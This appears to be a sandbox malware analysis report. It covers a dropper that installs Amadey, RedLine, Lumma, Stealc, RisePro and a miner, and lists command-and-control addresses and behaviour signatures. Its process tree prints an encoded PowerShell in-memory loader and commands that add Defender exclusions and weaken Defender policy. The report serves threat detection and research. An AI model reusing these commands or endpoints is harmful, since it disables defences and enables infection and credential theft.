Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 10:28

General

  • Target

    3c49c4b49a70a6a22dc7d77b536e3dca0778cbeb6591f229ceb0f8b081195305.exe

  • Size

    1.7MB

  • MD5

    fb7340addbdf16157febe06c00d39641

  • SHA1

    24a9c1e19de21286e8e247c98f7edb1f7c7d6fde

  • SHA256

    3c49c4b49a70a6a22dc7d77b536e3dca0778cbeb6591f229ceb0f8b081195305

  • SHA512

    9606a6b5d3ba933f63d7d389d0193f184df38651f736dc30afac5fef3e47eeff0b207e9410a157748568acaee0035006dc03801b54ecc34cf01f775ed8440fa0

  • SSDEEP

    49152:zqjxF2HylFHm+pZxg+pp23zrG40Ohw04X4/RtmRD:OjxF2Yhm+jE/N0OhI4/roD

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • XMRig Miner payload 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 49 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 37 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c49c4b49a70a6a22dc7d77b536e3dca0778cbeb6591f229ceb0f8b081195305.exe
    "C:\Users\Admin\AppData\Local\Temp\3c49c4b49a70a6a22dc7d77b536e3dca0778cbeb6591f229ceb0f8b081195305.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:3276
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:3396
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1012
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:2276
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4024
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2460
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1384
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                  7⤵
                    PID:5216
                    • C:\Windows\SysWOW64\choice.exe
                      choice /C Y /N /D Y /T 3
                      8⤵
                        PID:5772
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 336
                    6⤵
                    • Program crash
                    PID:3528
                • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:564
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                      PID:820
                  • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5040
                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:3676
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:676
                      • C:\Windows\SysWOW64\sc.exe
                        Sc stop GameServerClient
                        7⤵
                        • Launches sc.exe
                        PID:3484
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameServerClient confirm
                        7⤵
                        • Executes dropped EXE
                        PID:3244
                      • C:\Windows\SysWOW64\sc.exe
                        Sc delete GameSyncLink
                        7⤵
                        • Launches sc.exe
                        PID:1428
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameSyncLink confirm
                        7⤵
                        • Executes dropped EXE
                        PID:2156
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:3868
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService start GameSyncLink
                        7⤵
                        • Executes dropped EXE
                        PID:3608
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                      6⤵
                        PID:2156
                        • C:\Windows\SysWOW64\sc.exe
                          Sc stop GameServerClientC
                          7⤵
                          • Launches sc.exe
                          PID:2352
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameServerClientC confirm
                          7⤵
                          • Executes dropped EXE
                          PID:4700
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete PiercingNetLink
                          7⤵
                          • Launches sc.exe
                          PID:220
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove PiercingNetLink confirm
                          7⤵
                          • Executes dropped EXE
                          PID:820
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:232
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start PiercingNetLink
                          7⤵
                          • Executes dropped EXE
                          PID:676
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                        6⤵
                          PID:4488
                          • C:\Windows\SysWOW64\sc.exe
                            Sc delete GameSyncLinks
                            7⤵
                            • Launches sc.exe
                            PID:1544
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove GameSyncLinks confirm
                            7⤵
                            • Executes dropped EXE
                            PID:3184
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:1312
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService start GameSyncLinks
                            7⤵
                            • Executes dropped EXE
                            PID:2752
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                          6⤵
                            PID:5568
                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:856
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                            • Loads dropped DLL
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3736
                        • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2760
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:3608
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:4760
                            • C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:1308
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADUALAAgADAAeAAxADcALAAgADAAeABEAEUALAAgADAAeABCAEMALAAgADAAeABEAEYALAAgADAAeAA0ADAALAAgADAAeAA2ADgALAAgADAAeAA1ADcALAAgADAAeABDADUALAAgADAAeAA0ADQALAAgADAAeAA5ADQALAAgADAAeAA4ADAALAAgADAAeAA1ADEALAAgADAAeAA5ADkALAAgADAAeAA1ADgALAAgADAAeAA1ADkALAAgADAAeABBADAALAAgADAAeAAzAEEALAAgADAAeABDADgALAAgADAAeAAwADUALAAgADAAeAA2ADgALAAgADAAeAAxADMALAAgADAAeABGADgALAAgADAAeABFAEMALAAgADAAeAA0ADYALAAgADAAeAA4ADQALAAgADAAeABFADIALAAgADAAeABCADMALAAgADAAeAA1AEYALAAgADAAeABGADMALAAgADAAeAAxADMALAAgADAAeAAwAEYAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEUANgAsACAAMAB4AEYANAAsACAAMAB4AEMARAAsACAAMAB4ADcAQgAsACAAMAB4AEIAQwAsACAAMAB4AEIAQgAsACAAMAB4ADMAMgAsACAAMAB4AEQAMgAsACAAMAB4ADAAMAAsACAAMAB4AEYANgAsACAAMAB4AEYAMwAsACAAMAB4ADEAQQAsACAAMAB4AEQANQAsACAAMAB4AEQAOAAsACAAMAB4AEEANgAsACAAMAB4ADIAQQApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                6⤵
                                • UAC bypass
                                • Windows security bypass
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4200
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe" -Force
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5980
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                  7⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5988
                                  • C:\Users\Admin\Pictures\QL84SoLJqk1WDJ9Z037GmMb4.exe
                                    "C:\Users\Admin\Pictures\QL84SoLJqk1WDJ9Z037GmMb4.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5344
                                  • C:\Users\Admin\Pictures\88k75HQjitq7FgSAJom6XFq7.exe
                                    "C:\Users\Admin\Pictures\88k75HQjitq7FgSAJom6XFq7.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5236
                                  • C:\Users\Admin\Pictures\g9JryHFe4QOcxaSP0Zcy5tBS.exe
                                    "C:\Users\Admin\Pictures\g9JryHFe4QOcxaSP0Zcy5tBS.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:2752
                                  • C:\Users\Admin\Pictures\WSRDQrCfh6a1oM28ocDbSPF7.exe
                                    "C:\Users\Admin\Pictures\WSRDQrCfh6a1oM28ocDbSPF7.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5552
                                  • C:\Users\Admin\Pictures\5xm986xcuAo2wLlgZWkJFCnw.exe
                                    "C:\Users\Admin\Pictures\5xm986xcuAo2wLlgZWkJFCnw.exe" /s
                                    8⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Writes to the Master Boot Record (MBR)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5340
                                  • C:\Users\Admin\Pictures\NTmsTAZajQhpx5v2F4PD1MbR.exe
                                    "C:\Users\Admin\Pictures\NTmsTAZajQhpx5v2F4PD1MbR.exe"
                                    8⤵
                                    • Modifies firewall policy service
                                    • Windows security bypass
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Windows security modification
                                    • Checks whether UAC is enabled
                                    • Drops file in System32 directory
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:5692
                                  • C:\Users\Admin\Pictures\VGmr02kCcKXkh82ETITZHbFA.exe
                                    "C:\Users\Admin\Pictures\VGmr02kCcKXkh82ETITZHbFA.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5672
                                    • C:\Users\Admin\AppData\Local\Temp\7zSD6.tmp\Install.exe
                                      .\Install.exe /tEdidDDf "385118" /S
                                      9⤵
                                      • Checks BIOS information in registry
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Enumerates system info in registry
                                      PID:3900
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        10⤵
                                          PID:4356
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                            11⤵
                                              PID:5492
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                12⤵
                                                  PID:5904
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                    13⤵
                                                      PID:6140
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                  11⤵
                                                    PID:5708
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      12⤵
                                                        PID:5972
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                          13⤵
                                                            PID:2508
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                        11⤵
                                                          PID:2308
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            12⤵
                                                              PID:2056
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                13⤵
                                                                  PID:4132
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                              11⤵
                                                                PID:5400
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                  12⤵
                                                                    PID:5212
                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                      13⤵
                                                                        PID:4440
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                    11⤵
                                                                      PID:5584
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        12⤵
                                                                          PID:4928
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                            13⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5980
                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              14⤵
                                                                                PID:5288
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                        10⤵
